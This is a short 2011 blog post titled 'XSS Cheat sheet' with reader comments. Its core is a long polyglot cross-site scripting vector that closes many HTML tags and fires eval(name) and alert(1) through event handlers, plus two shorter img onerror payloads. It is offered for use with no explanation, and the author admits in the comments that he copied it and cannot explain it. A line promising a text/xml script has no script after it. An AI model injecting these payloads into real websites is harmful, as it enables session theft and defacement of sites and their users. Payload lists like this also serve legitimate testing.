XSS Cheat sheet

February 02

Best xss vector: If you know there is an XSS and if you are unable to identify the exact code which pop-ups the alert message, then use this vector.

javascript:/*–></marquee></script></title></textarea></noscript></style></xmp>”> [img=1]<img -/style=-=expression&#40/*’/-/*’,/**/eval(name)//);wi dth:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript :eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>””/>
<img src=”<img src=x”/onerror=alert(1)//”> Jquery: <img/src/onerror=alert(1)>

When content type is text/xml, use the below script.



Posted by on February 2, 2011 in web application hacking, Xss


Tags: , , ,

3 responses to “XSS Cheat sheet

  1. KK

    November 3, 2012 at 10:53 am

    Please could you describe little about this XSS vector?

  2. Rajeev Mishra

    February 18, 2013 at 1:46 pm

    Please elaborate this Script

    • satishb3

      February 18, 2013 at 9:28 pm

      I don’t remember exactly. I’ve copied that script long time ago from somewhere. Posted in my blog for reference.